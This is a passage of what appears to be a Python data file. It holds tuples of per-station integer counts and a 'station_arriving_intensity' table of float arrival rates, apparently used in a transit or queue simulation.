(18, 7, 14, 9, 7, 6, 7, 2, 7, 4, 3, 2, 0, 17, 20, 8, 6, 11, 5, 1, 4, 12, 6, 4, 1, 0), # 95
(18, 10, 9, 12, 10, 8, 9, 4, 4, 3, 5, 2, 0, 24, 15, 5, 10, 12, 11, 5, 5, 8, 6, 2, 1, 0), # 96
(15, 10, 11, 16, 11, 3, 5, 4, 3, 2, 3, 3, 0, 13, 11, 12, 8, 12, 5, 4, 0, 10, 2, 3, 1, 0), # 97
(22, 9, 10, 9, 12, 6, 7, 6, 6, 3, 1, 0, 0, 15, 20, 13, 9, 10, 7, 6, 4, 8, 8, 3, 1, 0), # 98
(15, 17, 9, 13, 8, 6, 6, 0, 4, 0, 2, 2, 0, 18, 15, 5, 11, 14, 6, 7, 6, 4, 5, 1, 2, 0), # 99
(16, 14, 12, 11, 10, 4, 6, 3, 5, 3, 2, 0, 0, 13, 12, 8, 8, 12, 5, 4, 2, 5, 6, 7, 3, 0), # 100
(14, 7, 13, 16, 11, 5, 3, 0, 7, 3, 2, 2, 0, 19, 8, 9, 6, 15, 8, 7, 5, 6, 3, 0, 2, 0), # 101
(18, 13, 13, 21, 16, 11, 3, 5, 6, 3, 0, 2, 0, 15, 13, 10, 9, 15, 6, 5, 2, 5, 10, 2, 2, 0), # 102
(15, 13, 12, 16, 10, 3, 6, 2, 6, 2, 0, 0, 0, 13, 10, 15, 10, 14, 12, 4, 3, 3, 3, 2, 1, 0), # 103
(15, 6, 21, 12, 19, 6, 7, 4, 6, 1, 2, 3, 0, 11, 6, 11, 7, 14, 2, 8, 3, 4, 8, 3, 2, 0), # 104
(18, 13, 12, 15, 13, 6, 2, 9, 8, 2, 5, 1, 0, 15, 20, 10, 7, 9, 5, 5, 3, 5, 3, 2, 1, 0), # 105
(13, 14, 9, 14, 5, 12, 5, 3, 5, 3, 2, 0, 0, 14, 11, 8, 2, 13, 8, 7, 0, 4, 5, 0, 2, 0), # 106
(15, 13, 15, 15, 16, 4, 3, 5, 5, 4, 0, 1, 0, 15, 14, 15, 3, 13, 5, 4, 4, 6, 2, 3, 1, 0), # 107
(11, 12, 17, 9, 9, 4, 8, 9, 9, 3, 4, 1, 0, 19, 15, 8, 7, 8, 5, 4, 4, 1, 6, 2, 1, 0), # 108
(13, 14, 17, 10, 12, 2, 5, 8, 5, 1, 0, 2, 0, 13, 16, 7, 9, 6, 5, 6, 5, 9, 5, 1, 0, 0), # 109
(15, 13, 11, 8, 15, 3, 4, 6, 6, 2, 1, 0, 0, 17, 11, 2, 4, 8, 6, 4, 3, 4, 2, 0, 1, 0), # 110
(13, 11, 11, 15, 18, 2, 8, 2, 2, 2, 3, 1, 0, 13, 14, 10, 9, 8, 6, 2, 8, 11, 8, 0, 2, 0), # 111
(18, 10, 14, 10, 11, 6, 6, 3, 6, 2, 1, 1, 0, 16, 17, 9, 7, 13, 3, 5, 6, 5, 4, 2, 1, 0), # 112
(11, 8, 12, 9, 4, 2, 3, 9, 1, 3, 5, 3, 0, 15, 9, 7, 7, 10, 6, 9, 8, 6, 2, 1, 0, 0), # 113
(14, 9, 14, 18, 9, 3, 2, 4, 6, 5, 1, 2, 0, 16, 17, 10, 9, 11, 5, 4, 2, 10, 2, 4, 2, 0), # 114
(8, 5, 15, 12, 12, 7, 6, 5, 5, 7, 2, 0, 0, 15, 12, 8, 10, 15, 4, 2, 2, 7, 5, 3, 2, 0), # 115
(12, 7, 12, 16, 9, 8, 3, 5, 3, 5, 2, 1, 0, 11, 12, 18, 7, 13, 6, 7, 4, 5, 3, 1, 1, 0), # 116
(15, 9, 10, 14, 13, 5, 10, 6, 4, 1, 2, 2, 0, 9, 10, 11, 5, 14, 4, 3, 6, 4, 3, 5, 1, 0), # 117
(12, 7, 15, 10, 10, 7, 6, 6, 4, 3, 3, 1, 0, 10, 15, 10, 11, 13, 5, 4, 5, 8, 6, 8, 0, 0), # 118
(16, 8, 8, 18, 10, 5, 1, 5, 8, 2, 3, 0, 0, 11, 16, 9, 8, 12, 6, 3, 2, 3, 6, 1, 0, 0), # 119
(13, 19, 10, 10, 9, 5, 5, 4, 7, 4, 1, 1, 0, 11, 13, 9, 6, 14, 4, 3, 2, 5, 4, 0, 1, 0), # 120
(15, 11, 9, 15, 12, 6, 3, 4, 6, 4, 3, 1, 0, 14, 7, 7, 5, 11, 10, 5, 4, 4, 3, 0, 1, 0), # 121
(14, 9, 13, 11, 4, 5, 3, 6, 9, 2, 6, 0, 0, 21, 12, 5, 7, 15, 7, 6, 6, 5, 3, 5, 1, 0), # 122
(12, 12, 11, 15, 10, 8, 3, 4, 3, 2, 1, 2, 0, 17, 9, 14, 7, 10, 5, 4, 1, 8, 2, 2, 1, 0), # 123
(14, 11, 8, 12, 15, 4, 3, 8, 3, 2, 2, 0, 0, 16, 10, 16, 13, 7, 2, 2, 1, 6, 5, 1, 0, 0), # 124
(15, 11, 7, 11, 10, 4, 7, 3, 3, 2, 2, 1, 0, 14, 10, 9, 3, 10, 4, 8, 8, 5, 3, 4, 0, 0), # 125
(17, 10, 13, 12, 8, 6, 3, 2, 10, 5, 1, 0, 0, 8, 9, 8, 6, 16, 5, 3, 3, 5, 4, 2, 0, 0), # 126
(17, 8, 15, 16, 13, 5, 3, 4, 5, 0, 1, 1, 0, 18, 12, 13, 8, 9, 3, 3, 5, 5, 7, 3, 0, 0), # 127
(18, 11, 21, 8, 8, 4, 8, 3, 10, 5, 0, 1, 0, 11, 11, 4, 4, 10, 9, 4, 3, 3, 2, 1, 2, 0), # 128
(16, 13, 9, 17, 12, 4, 3, 3, 5, 2, 1, 0, 0, 19, 9, 9, 8, 7, 4, 2, 1, 8, 6, 2, 1, 0), # 129
(12, 10, 10, 11, 11, 4, 4, 4, 8, 1, 0, 0, 0, 18, 10, 5, 6, 12, 7, 6, 4, 9, 6, 2, 2, 0), # 130
(12, 7, 14, 11, 10, 4, 4, 4, 2, 1, 1, 1, 0, 8, 10, 7, 7, 13, 5, 2, 4, 5, 3, 4, 2, 0), # 131
(15, 11, 7, 16, 6, 2, 3, 3, 7, 0, 4, 2, 0, 20, 10, 9, 9, 12, 12, 9, 3, 1, 3, 2, 1, 0), # 132
(15, 11, 16, 19, 9, 6, 3, 2, 4, 2, 1, 0, 0, 16, 18, 11, 4, 13, 8, 1, 6, 6, 6, 1, 0, 0), # 133
(18, 8, 8, 13, 9, 8, 11, 3, 3, 2, 2, 2, 0, 13, 12, 14, 5, 12, 4, 2, 7, 7, 2, 0, 1, 0), # 134
(10, 19, 14, 10, 11, 3, 0, 5, 4, 2, 2, 0, 0, 14, 7, 8, 5, 16, 3, 7, 4, 5, 5, 1, 2, 0), # 135
(13, 15, 12, 6, 10, 7, 4, 3, 5, 0, 3, 0, 0, 15, 14, 9, 4, 10, 11, 9, 6, 5, 6, 1, 1, 0), # 136
(18, 9, 13, 6, 8, 3, 4, 4, 6, 0, 2, 2, 0, 18, 7, 6, 6, 8, 5, 3, 3, 7, 4, 3, 1, 0), # 137
(11, 12, 19, 10, 10, 6, 3, 7, 3, 1, 4, 0, 0, 15, 12, 8, 3, 10, 5, 3, 3, 10, 2, 1, 0, 0), # 138
(20, 10, 15, 11, 14, 2, 3, 6, 7, 1, 4, 2, 0, 10, 11, 8, 10, 11, 2, 9, 5, 5, 10, 2, 2, 0), # 139
(17, 11, 6, 10, 7, 7, 2, 6, 11, 2, 1, 0, 0, 13, 8, 11, 5, 12, 2, 5, 1, 2, 2, 1, 3, 0), # 140
(16, 12, 13, 12, 7, 5, 2, 6, 8, 1, 0, 2, 0, 13, 12, 7, 10, 9, 3, 5, 3, 5, 3, 3, 1, 0), # 141
(13, 10, 10, 6, 13, 4, 3, 4, 2, 5, 1, 1, 0, 13, 11, 1, 6, 15, 11, 2, 2, 7, 2, 3, 2, 0), # 142
(13, 6, 13, 22, 9, 4, 5, 2, 6, 2, 1, 1, 0, 12, 7, 9, 11, 7, 2, 6, 3, 4, 9, 2, 0, 0), # 143
(10, 7, 9, 9, 12, 4, 5, 6, 5, 3, 2, 0, 0, 14, 11, 11, 10, 8, 4, 6, 4, 5, 1, 1, 2, 0), # 144
(15, 8, 12, 19, 11, 4, 2, 5, 6, 6, 2, 1, 0, 12, 12, 10, 6, 8, 7, 3, 6, 11, 4, 2, 0, 0), # 145
(16, 10, 12, 10, 7, 5, 3, 4, 1, 0, 1, 2, 0, 19, 8, 9, 8, 10, 5, 3, 3, 11, 3, 3, 1, 0), # 146
(11, 13, 17, 8, 8, 6, 4, 4, 10, 5, 0, 2, 0, 13, 11, 9, 5, 8, 6, 2, 3, 14, 6, 1, 3, 0), # 147
(14, 13, 10, 12, 6, 7, 2, 4, 3, 3, 0, 2, 0, 13, 10, 12, 5, 7, 3, 2, 3, 5, 1, 0, 1, 0), # 148
(10, 6, 11, 9, 10, 8, 2, 4, 3, 0, 2, 1, 0, 15, 12, 7, 9, 12, 3, 1, 1, 5, 4, 5, 0, 0), # 149
(14, 9, 8, 16, 13, 3, 2, 3, 6, 2, 2, 1, 0, 21, 15, 7, 7, 16, 2, 6, 5, 2, 2, 0, 1, 0), # 150
(11, 12, 11, 12, 7, 2, 8, 6, 0, 3, 0, 1, 0, 11, 8, 5, 11, 13, 4, 3, 5, 5, 4, 2, 1, 0), # 151
(10, 12, 11, 15, 18, 2, 5, 2, 8, 2, 1, 2, 0, 17, 13, 4, 4, 13, 6, 4, 1, 3, 8, 1, 1, 0), # 152
(11, 12, 10, 8, 4, 6, 2, 9, 4, 4, 0, 0, 0, 15, 10, 8, 2, 7, 6, 3, 0, 1, 2, 3, 2, 0), # 153
(15, 9, 12, 12, 8, 8, 4, 5, 9, 1, 1, 2, 0, 16, 9, 6, 4, 12, 7, 3, 5, 7, 5, 3, 0, 0), # 154
(9, 14, 10, 13, 10, 7, 2, 6, 7, 1, 1, 1, 0, 12, 10, 3, 9, 11, 4, 5, 2, 3, 5, 3, 0, 0), # 155
(14, 10, 12, 12, 8, 7, 0, 3, 3, 4, 2, 1, 0, 20, 16, 8, 5, 4, 1, 4, 6, 9, 5, 2, 0, 0), # 156
(21, 6, 11, 20, 12, 2, 5, 2, 5, 1, 0, 1, 0, 14, 7, 7, 7, 9, 8, 6, 3, 4, 6, 2, 0, 0), # 157
(6, 9, 13, 11, 6, 4, 5, 3, 4, 4, 1, 1, 0, 12, 12, 9, 2, 13, 5, 5, 3, 1, 5, 1, 1, 0), # 158
(5, 8, 14, 3, 5, 4, 1, 2, 5, 0, 2, 1, 0, 17, 8, 8, 6, 6, 5, 6, 2, 5, 3, 3, 2, 0), # 159
(8, 13, 11, 12, 8, 4, 3, 8, 4, 0, 1, 1, 0, 10, 10, 6, 1, 9, 4, 1, 1, 6, 3, 1, 0, 0), # 160
(9, 6, 18, 12, 10, 6, 6, 2, 3, 1, 1, 1, 0, 11, 9, 12, 3, 13, 7, 4, 4, 5, 5, 2, 1, 0), # 161
(11, 8, 6, 7, 10, 1, 3, 7, 6, 3, 0, 1, 0, 8, 15, 6, 9, 16, 5, 1, 2, 5, 3, 1, 0, 0), # 162
(13, 6, 6, 7, 11, 9, 2, 2, 4, 0, 1, 0, 0, 13, 9, 8, 4, 11, 1, 2, 1, 3, 3, 3, 2, 0), # 163
(8, 5, 16, 13, 8, 8, 3, 0, 4, 0, 0, 2, 0, 12, 12, 8, 7, 10, 8, 6, 3, 8, 2, 2, 0, 0), # 164
(14, 6, 6, 7, 8, 4, 2, 1, 4, 2, 0, 2, 0, 10, 7, 7, 4, 7, 7, 3, 4, 3, 5, 1, 0, 0), # 165
(4, 13, 13, 10, 14, 4, 5, 2, 5, 5, 2, 0, 0, 15, 3, 12, 2, 16, 5, 3, 3, 1, 3, 1, 1, 0), # 166
(9, 8, 14, 12, 3, 2, 1, 4, 5, 3, 0, 2, 0, 10, 10, 9, 5, 12, 0, 4, 5, 8, 4, 0, 0, 0), # 167
(18, 6, 10, 8, 8, 6, 1, 4, 7, 3, 0, 2, 0, 11, 11, 9, 5, 6, 7, 1, 1, 5, 2, 1, 0, 0), # 168
(9, 10, 14, 3, 5, 5, 3, 4, 4, 1, 1, 2, 0, 8, 4, 8, 3, 6, 5, 2, 2, 4, 4, 3, 1, 0), # 169
(8, 11, 10, 6, 8, 0, 4, 4, 6, 3, 0, 2, 0, 13, 5, 7, 3, 1, 7, 3, 3, 8, 2, 1, 2, 0), # 170
(10, 3, 13, 8, 5, 5, 5, 4, 4, 1, 4, 1, 0, 13, 10, 4, 2, 9, 3, 0, 2, 7, 3, 5, 1, 0), # 171
(15, 3, 7, 7, 6, 4, 1, 2, 2, 1, 1, 1, 0, 9, 8, 5, 7, 7, 0, 1, 2, 4, 2, 2, 2, 0), # 172
(10, 2, 10, 9, 7, 5, 2, 5, 4, 0, 0, 0, 0, 10, 7, 5, 2, 10, 1, 3, 5, 5, 3, 0, 0, 0), # 173
(7, 3, 6, 7, 6, 2, 3, 6, 5, 2, 1, 0, 0, 8, 4, 7, 9, 7, 2, 3, 3, 4, 5, 1, 0, 0), # 174
(3, 5, 10, 7, 4, 3, 4, 3, 1, 1, 0, 0, 0, 10, 6, 7, 4, 7, 4, 0, 1, 1, 4, 1, 0, 0), # 175
(9, 4, 7, 5, 7, 1, 3, 3, 3, 3, 0, 0, 0, 5, 11, 5, 3, 4, 2, 2, 4, 3, 3, 1, 0, 0), # 176
(6, 3, 4, 12, 4, 4, 2, 2, 1, 0, 1, 0, 0, 7, 7, 5, 1, 14, 1, 4, 2, 2, 2, 1, 0, 0), # 177
(6, 2, 8, 3, 5, 2, 2, 2, 4, 0, 2, 0, 0, 8, 5, 1, 3, 6, 3, 3, 3, 2, 2, 3, 1, 0), # 178
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), # 179
)
station_arriving_intensity = (
(8.033384925394829, 8.840461695509067, 8.33805316738001, 9.943468438181492, 8.887496972175379, 5.021847891259743, 6.6336569845982645, 7.445081876767077, 9.744158499468812, 6.332824024835792, 6.728424262216965, 7.836664125289878, 8.134208340125381), # 0
(8.566923443231959, 9.424097110631614, 8.888554546128244, 10.600230805242587, 9.475984539958779, 5.353573734468089, 7.07115030602191, 7.9352219566491335, 10.387592522132655, 6.75036910764344, 7.172953817529811, 8.353946657302968, 8.671666635903767), # 1
(9.09875681436757, 10.005416273425567, 9.436867656875862, 11.254380327463672, 10.062340757999591, 5.683976183219912, 7.506909612737127, 8.423400396647072, 11.028458891004078, 7.166262040032874, 7.615717038042101, 8.869172243284888, 9.206983725135505), # 2
(9.6268124690345, 10.582112803098315, 9.980817390911767, 11.903322252051318, 10.644258681603043, 6.011744996136181, 7.939205826636729, 8.907681851991212, 11.664216257473749, 7.578852317481889, 8.054957458923813, 9.380297095888738, 9.738036490006762), # 3
(10.149017837465571, 11.15188031885724, 10.518228639524859, 12.544461826212112, 11.219431366074389, 6.335569931837869, 8.366309869613534, 9.386130977911865, 12.292323272932332, 7.986489435468286, 8.48891861534492, 9.885277427767623, 10.262701812703709), # 4
(10.663300349893618, 11.712412439909741, 11.04692629400403, 13.17520429715263, 11.785551866718848, 6.654140748945943, 8.786492663560358, 9.856812429639348, 12.910238588770495, 8.387522889469862, 8.915844042475412, 10.382069451574637, 10.778856575412524), # 5
(11.167587436551466, 12.261402785463202, 11.564735245638186, 13.792954912079445, 12.34031323884167, 6.9661472060813825, 9.19802513037002, 10.317790862403982, 13.515420856378904, 8.780302174964413, 9.333977275485251, 10.868629379962893, 11.284377660319372), # 6
(11.65980652767195, 12.79654497472501, 12.069480385716217, 14.39511891819914, 12.881408537748086, 7.270279061865153, 9.599178191935335, 10.767130931436084, 14.105328727148231, 9.16317678742974, 9.74156184954443, 11.342913425585486, 11.777141949610431), # 7
(12.137885053487896, 13.31553262690256, 12.558986605527034, 14.979101562718284, 13.406530818743338, 7.565226074918224, 9.988222770149116, 11.20289729196596, 14.67742085246913, 9.53449622234364, 10.136841299822914, 11.802877801095525, 12.255026325471867), # 8
(12.599750444232136, 13.816059361203237, 13.031078796359527, 15.54230809284347, 13.913373137132655, 7.849678003861574, 10.363429786904192, 11.623154599223941, 15.229155883732279, 9.892609975183907, 10.518059161490685, 12.246478719146102, 12.71590767008986), # 9
(13.043330130137491, 14.295818796834425, 13.483581849502599, 16.08214375578126, 14.399628548221282, 8.122324607316171, 10.723070164093368, 12.025967508440338, 15.757992472328343, 10.235867541428343, 10.883458969717719, 12.671672392390324, 13.157662865650577), # 10
(13.466551541436809, 14.752504553003531, 13.914320656245145, 16.596013798738237, 14.862990107314454, 8.38185564390299, 11.065414823609466, 12.409400674845465, 16.26138926964799, 10.56261841655475, 11.231284259673998, 13.076415033481297, 13.57816879434018), # 11
(13.8673421083629, 15.183810248917917, 14.321120107876064, 17.08132346892098, 15.301150869717404, 8.626960872242991, 11.388734687345298, 12.771518753669634, 16.736804927081888, 10.871212096040916, 11.559778566529495, 13.45866285507211, 13.975302338344855), # 12
(14.243629261148602, 15.587429503784993, 14.701805095684259, 17.53547801353607, 15.711803890735363, 8.856330050957158, 11.69130067719369, 13.11038640014317, 17.181698096020693, 11.159998075364648, 11.86718542545419, 13.816372069815873, 14.346940379850777), # 13
(14.593340430026746, 15.961055936812143, 15.054200510958635, 17.95588267979007, 16.092642225673583, 9.068652938666455, 11.971383715047459, 13.424068269496395, 17.593527427855076, 11.427325850003735, 12.151748371618055, 14.147498890365696, 14.690959801044102), # 14
(14.914403045230168, 16.30238316720675, 15.376131244988068, 18.339942714889578, 16.441358929837293, 9.26261929399186, 12.227254722799401, 13.71062901695961, 17.96975157397571, 11.671544915435986, 12.411710940191071, 14.449999529374674, 15.00523748411101), # 15
(15.204744536991681, 16.609104814176213, 15.66542218906148, 18.685063366041145, 16.755647058531732, 9.436918875554335, 12.457184622342362, 13.968133297763139, 18.307829185773258, 11.891004767139194, 12.64531666634322, 14.721830199495905, 15.287650311237673), # 16
(15.46229233554412, 16.878914496927916, 15.919898234467764, 18.98864988045138, 17.033199667062142, 9.590241441974857, 12.659444335569138, 14.19464576713731, 18.605218914638375, 12.084054900591148, 12.850809085244478, 14.960947113382488, 15.536075164610265), # 17
(15.684973871120327, 17.10950583466924, 16.137384272495808, 19.248107505326846, 17.271709810733743, 9.721276751874406, 12.832304784372562, 14.388231080312417, 18.859379411961754, 12.249044811269659, 13.026431732064815, 15.165306483687544, 15.748388926414954), # 18
(15.870716573953118, 17.29857244660759, 16.315705194434525, 19.460841487874106, 17.468870544851786, 9.828714563873934, 12.974036890645431, 14.546953892518793, 19.067769329134048, 12.384323994652526, 13.170428141974206, 15.332864523064154, 15.922468478837914), # 19
(16.01744787427533, 17.44380795195034, 16.452685891572806, 19.624257075299766, 17.62237492472151, 9.91124463659443, 13.08291157628058, 14.668878858986748, 19.22784731754592, 12.488241946217535, 13.28104185014264, 15.461577444165426, 16.05619070406532), # 20
(16.123095202319785, 17.542905969904893, 16.54615125519955, 19.73575951481038, 17.729916005648143, 9.967556728656858, 13.157199763170816, 14.752070634946598, 19.337072028588036, 12.559148161442488, 13.356516391740096, 15.54940145964447, 16.147432484283325), # 21
(16.18558598831933, 17.59356011967863, 16.593926176603656, 19.79275405361254, 17.78918684293692, 9.996340598682188, 13.19517237320896, 14.794593875628664, 19.392902113651065, 12.595392135805188, 13.395095301936545, 15.594292782154383, 16.194070701678125), # 22
(16.208629381348224, 17.599557750342935, 16.599877091906723, 19.799889300411525, 17.804371289652156, 10.0, 13.199686403614942, 14.79919012345679, 19.399881975308645, 12.599667636031093, 13.399932859458785, 15.599836122542294, 16.2), # 23
(16.225619860854646, 17.59605925925926, 16.598903703703705, 19.799011111111113, 17.812972181783763, 10.0, 13.197206100217867, 14.7928, 19.398946666666667, 12.59704098765432, 13.39939932659933, 15.598538271604937, 16.2), # 24
(16.242251568338528, 17.589163237311386, 16.59698216735254, 19.797273662551444, 17.821383912951205, 10.0, 13.192318244170096, 14.78024691358025, 19.3970987654321, 12.591870141746686, 13.39834143908218, 15.595976223136716, 16.2), # 25
(16.258523230476854, 17.578975034293556, 16.594138820301787, 19.79469670781893, 17.82960618947377, 10.0, 13.185098749293955, 14.76176790123457, 19.39436197530864, 12.58424113397348, 13.396768774161368, 15.592185093735715, 16.2), # 26
(16.27443357394662, 17.5656, 16.5904, 19.7913, 17.837638717670742, 10.0, 13.175623529411766, 14.7376, 19.39076, 12.57424, 13.39469090909091, 15.587200000000003, 16.2), # 27
(16.2899813254248, 17.549143484224967, 16.585792043895747, 19.787103292181072, 17.845481203861443, 10.0, 13.163968498345842, 14.707980246913582, 19.386316543209876, 12.561952775491541, 13.39211742112483, 15.581056058527665, 16.2), # 28
(16.3051652115884, 17.52971083676269, 16.580341289437587, 19.78212633744856, 17.853133354365152, 10.0, 13.150209569918506, 14.673145679012345, 19.381055308641976, 12.547465496113398, 13.389057887517147, 15.57378838591678, 16.2), # 29
(16.319983959114396, 17.50740740740741, 16.574074074074073, 19.77638888888889, 17.860594875501178, 10.0, 13.13442265795207, 14.633333333333333, 19.375, 12.530864197530866, 13.385521885521886, 15.56543209876543, 16.2), # 30
(16.334436294679772, 17.482338545953365, 16.567016735253773, 19.76991069958848, 17.867865473588814, 10.0, 13.116683676268863, 14.588780246913581, 19.368174320987656, 12.512234915409238, 13.381518992393067, 15.556022313671699, 16.2), # 31
(16.34852094496153, 17.45460960219479, 16.55919561042524, 19.762711522633747, 17.874944854947355, 10.0, 13.097068538691198, 14.539723456790126, 19.360601975308644, 12.49166368541381, 13.377058785384712, 15.545594147233656, 16.2), # 32
(16.362236636636634, 17.424325925925924, 16.55063703703704, 19.75481111111111, 17.8818327258961, 10.0, 13.075653159041394, 14.486400000000001, 19.352306666666667, 12.469236543209878, 13.372150841750841, 15.534182716049381, 16.2), # 33
(16.375582096382097, 17.391592866941014, 16.541367352537723, 19.746229218106997, 17.888528792754347, 10.0, 13.052513451141776, 14.429046913580246, 19.343312098765438, 12.445039524462736, 13.36680473874548, 15.521823136716964, 16.2), # 34
(16.388556050874893, 17.356515775034293, 16.53141289437586, 19.736985596707818, 17.895032761841392, 10.0, 13.027725328814654, 14.367901234567903, 19.333641975308645, 12.419158664837678, 13.361030053622645, 15.508550525834478, 16.2), # 35
(16.40115722679201, 17.3192, 16.5208, 19.7271, 17.901344339476537, 10.0, 13.001364705882352, 14.303200000000002, 19.32332, 12.391680000000001, 13.354836363636364, 15.494400000000002, 16.2), # 36
(16.41338435081044, 17.27975089163237, 16.50955500685871, 19.71659218106996, 17.907463231979076, 10.0, 12.97350749616719, 14.23518024691358, 19.31236987654321, 12.362689565615, 13.348233246040657, 15.479406675811616, 16.2), # 37
(16.425236149607162, 17.238273799725654, 16.49770425240055, 19.70548189300412, 17.913389145668305, 10.0, 12.944229613491487, 14.164079012345681, 19.300815308641976, 12.332273397347967, 13.341230278089538, 15.4636056698674, 16.2), # 38
(16.436711349859177, 17.194874074074075, 16.485274074074077, 19.69378888888889, 17.919121786863524, 10.0, 12.913606971677561, 14.090133333333334, 19.288680000000003, 12.300517530864198, 13.333837037037037, 15.447032098765431, 16.2), # 39
(16.44780867824346, 17.149657064471878, 16.472290809327845, 19.6815329218107, 17.924660861884032, 10.0, 12.88171548454773, 14.013580246913584, 19.27598765432099, 12.267508001828991, 13.326063100137175, 15.429721079103798, 16.2), # 40
(16.458526861437004, 17.102728120713305, 16.458780795610426, 19.66873374485597, 17.930006077049125, 10.0, 12.848631065924312, 13.934656790123459, 19.262761975308642, 12.233330845907636, 13.317918044643973, 15.411707727480568, 16.2), # 41
(16.4688646261168, 17.054192592592596, 16.444770370370374, 19.655411111111114, 17.935157138678093, 10.0, 12.814429629629629, 13.8536, 19.24902666666667, 12.198072098765433, 13.30941144781145, 15.393027160493828, 16.2), # 42
(16.47882069895983, 17.00415582990398, 16.430285871056242, 19.641584773662554, 17.940113753090245, 10.0, 12.779187089486001, 13.770646913580249, 19.234805432098767, 12.161817796067673, 13.300552886893627, 15.373714494741657, 16.2), # 43
(16.488393806643085, 16.9527231824417, 16.4153536351166, 19.62727448559671, 17.944875626604873, 10.0, 12.742979359315743, 13.686034567901238, 19.220121975308643, 12.124653973479653, 13.291351939144532, 15.353804846822133, 16.2), # 44
(16.497582675843546, 16.900000000000002, 16.400000000000002, 19.6125, 17.949442465541274, 10.0, 12.705882352941178, 13.600000000000001, 19.205, 12.086666666666668, 13.281818181818181, 15.333333333333332, 16.2), # 45
(16.50638603323821, 16.846091632373113, 16.384251303155008, 19.59728106995885, 17.953813976218747, 10.0, 12.667971984184621, 13.512780246913582, 19.189463209876543, 12.04794191129401, 13.271961192168598, 15.312335070873344, 16.2), # 46
(16.514802605504055, 16.79110342935528, 16.36813388203018, 19.581637448559672, 17.957989864956588, 10.0, 12.629324166868395, 13.424612345679012, 19.173535308641977, 12.008565743026978, 13.261790547449806, 15.29084517604024, 16.2), # 47
(16.522831119318074, 16.735140740740743, 16.351674074074076, 19.565588888888893, 17.961969838074097, 10.0, 12.590014814814815, 13.335733333333335, 19.15724, 11.968624197530865, 13.251315824915824, 15.268898765432098, 16.2), # 48
(16.53047030135726, 16.67830891632373, 16.334898216735255, 19.549155144032923, 17.965753601890572, 10.0, 12.550119841846204, 13.246380246913581, 19.14060098765432, 11.928203310470966, 13.240546601820677, 15.246530955647007, 16.2), # 49
(16.537718878298588, 16.620713305898494, 16.31783264746228, 19.53235596707819, 17.969340862725304, 10.0, 12.50971516178488, 13.15679012345679, 19.12364197530864, 11.887389117512575, 13.22949245541838, 15.223776863283039, 16.2), # 50
(16.544575576819057, 16.56245925925926, 16.300503703703704, 19.515211111111114, 17.9727313268976, 10.0, 12.46887668845316, 13.0672, 19.10638666666667, 11.846267654320988, 13.218162962962964, 15.200671604938274, 16.2), # 51
(16.551039123595647, 16.503652126200276, 16.282937722908095, 19.497740329218107, 17.975924700726743, 10.0, 12.427680335673365, 12.977846913580246, 19.0888587654321, 11.8049249565615, 13.206567701708444, 15.177250297210794, 16.2), # 52
(16.55710824530535, 16.444397256515778, 16.26516104252401, 19.479963374485596, 17.978920690532046, 10.0, 12.386202017267813, 12.888967901234569, 19.071081975308644, 11.763447059899406, 13.194716248908842, 15.153548056698675, 16.2), # 53
(16.562781668625146, 16.384800000000002, 16.2472, 19.4619, 17.981719002632804, 10.0, 12.344517647058824, 12.800799999999999, 19.05308, 11.72192, 13.18261818181818, 15.1296, 16.2), # 54
(16.568058120232035, 16.324965706447188, 16.229080932784637, 19.443569958847736, 17.984319343348304, 10.0, 12.302703138868717, 12.71358024691358, 19.034876543209876, 11.68042981252858, 13.170283077690485, 15.10544124371285, 16.2), # 55
(16.572936326802996, 16.264999725651577, 16.210830178326475, 19.424993004115226, 17.986721418997856, 10.0, 12.26083440651981, 12.627545679012346, 19.016495308641975, 11.639062533150437, 13.157720513779774, 15.0811069044353, 16.2), # 56
(16.577415015015013, 16.205007407407408, 16.192474074074077, 19.40618888888889, 17.988924935900748, 10.0, 12.218987363834422, 12.542933333333336, 18.997960000000003, 11.597904197530866, 13.144940067340068, 15.056632098765432, 16.2), # 57
(16.581492911545087, 16.145094101508917, 16.174038957475997, 19.387177366255145, 17.99092960037628, 10.0, 12.177237924634875, 12.459980246913581, 18.979294320987655, 11.557040841335164, 13.131951315625393, 15.032051943301326, 16.2), # 58
(16.585168743070195, 16.085365157750342, 16.155551165980796, 19.367978189300413, 17.992735118743752, 10.0, 12.135662002743485, 12.378923456790124, 18.960521975308644, 11.516558500228626, 13.11876383588976, 15.007401554641062, 16.2), # 59
(16.588441236267325, 16.02592592592593, 16.137037037037036, 19.34861111111111, 17.99434119732246, 10.0, 12.094335511982571, 12.3, 18.94166666666667, 11.476543209876544, 13.105387205387206, 14.982716049382717, 16.2), # 60
(16.591309117813463, 15.966881755829906, 16.11852290809328, 19.329095884773665, 17.995747542431697, 10.0, 12.053334366174454, 12.223446913580247, 18.922752098765432, 11.437081005944217, 13.091831001371743, 14.958030544124373, 16.2), # 61
(16.593771114385607, 15.908337997256517, 16.100035116598082, 19.30945226337449, 17.996953860390775, 10.0, 12.01273447914145, 12.149501234567902, 18.903801975308642, 11.398257924096939, 13.078104801097394, 14.933380155464107, 16.2), # 62
(16.595825952660736, 15.8504, 16.0816, 19.289700000000003, 17.99795985751897, 10.0, 11.972611764705881, 12.078400000000002, 18.88484, 11.36016, 13.064218181818184, 14.9088, 16.2), # 63
(16.597472359315837, 15.793173113854596, 16.0632438957476, 19.26985884773663, 17.998765240135597, 10.0, 11.933042136690068, 12.010380246913583, 18.86588987654321, 11.322873269318702, 13.050180720788127, 14.884325194330135, 16.2), # 64
(16.5987090610279, 15.73676268861454, 16.04499314128944, 19.249948559670784, 17.999369714559947, 10.0, 11.894101508916325, 11.945679012345678, 18.846975308641976, 11.286483767718336, 13.036001995261257, 14.859990855052581, 16.2), # 65
(16.599534784473914, 15.681274074074077, 16.026874074074076, 19.22998888888889, 17.999772987111317, 10.0, 11.855865795206972, 11.884533333333335, 18.828120000000002, 11.251077530864197, 13.021691582491583, 14.835832098765435, 16.2), # 66
(16.59994825633087, 15.626812620027435, 16.00891303155007, 19.209999588477366, 17.99997476410901, 10.0, 11.81841090938433, 11.827180246913583, 18.809347654320987, 11.216740594421584, 13.007259059733137, 14.811884042066758, 16.2), # 67
(16.59966658316932, 15.573197822912517, 15.991049519890261, 19.189826784755773, 17.999804728475752, 9.99981441853376, 11.781624311727434, 11.77335016003658, 18.790540557841794, 11.183392706635466, 12.992457581664603, 14.788048035039589, 16.19980024005487), # 68
